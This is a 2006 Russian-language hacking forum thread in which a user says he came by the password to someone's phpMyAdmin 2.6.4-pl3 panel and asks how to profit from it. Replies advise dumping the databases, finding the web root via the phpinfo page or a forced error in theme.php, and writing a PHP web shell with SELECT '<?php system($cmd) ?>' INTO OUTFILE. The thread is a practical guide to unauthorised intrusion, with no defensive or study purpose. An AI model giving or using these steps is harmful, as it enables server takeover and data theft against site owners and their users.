Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   phpMyAdmin 2.6.4-pl3 есть пароль. Что делать? (https://forum.antichat.xyz/showthread.php?t=25988)

m2infect 26.10.2006 17:47
phpMyAdmin 2.6.4-pl3 есть пароль. Что делать?
 
Добрый день/вечер!

Аист принес мне записку, на которой был написан пароль от админки "phpMyAdmin 2.6.4-pl3".

Что можно сделать, кроме как понатыкать на разные кнопочки. Хочется поиметь какую-то выгоду...

С уважением.

InferNo23 26.10.2006 17:52
сделай дамп баз... просмотреть базы можно коомандой Show Databases

c411k 26.10.2006 19:39
шелл залей, если into outfile конечно разрешен.. вообще man sql!

blackybr 26.10.2006 22:19
а у яндекса слабо спросить? да хоть
Цитата:
_http://www.securitylab.ru/vulnerability/242774.php

m2infect 27.10.2006 09:44
Цитата:
Сообщение от c411k
шелл залей, если into outfile конечно разрешен.. вообще man sql!
А можно подрбно описать, как проверить разрешен или нет.

Я так понял, что нужно
PHP код:
SELECT FROM table INTO OUTFILE 'путь_к_файлу/файл'
Только вот куда он запишет. Скорее всего он запишет его не в корене WWW-сервера и просмотреть его я не смогу. Нужно узнать полный путь - куда сохранять файл.

Как узнать этот путь?
Кому "+"

Qwazar 27.10.2006 10:00
Там есть ссылочка "Показать информацию о PHP" глянь там есть путь в разделе "PHP Variables". Ну а дальше прикинь в какую папку может быть разрешена запись.

Goudini 27.10.2006 17:16
Узнаешь DOCUMENT_ROOT, потом
Цитата:
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
Если хватит прав на запись ..

Morph 27.10.2006 18:47
Попробуй зайти в файлик theme.php?themes=sosatpalec или theme и вылезет ошибка кароче, вот те и путь.


Поидее пароль рутовый должен быть чтобы инто оутфайл сделать.


Время: 04:03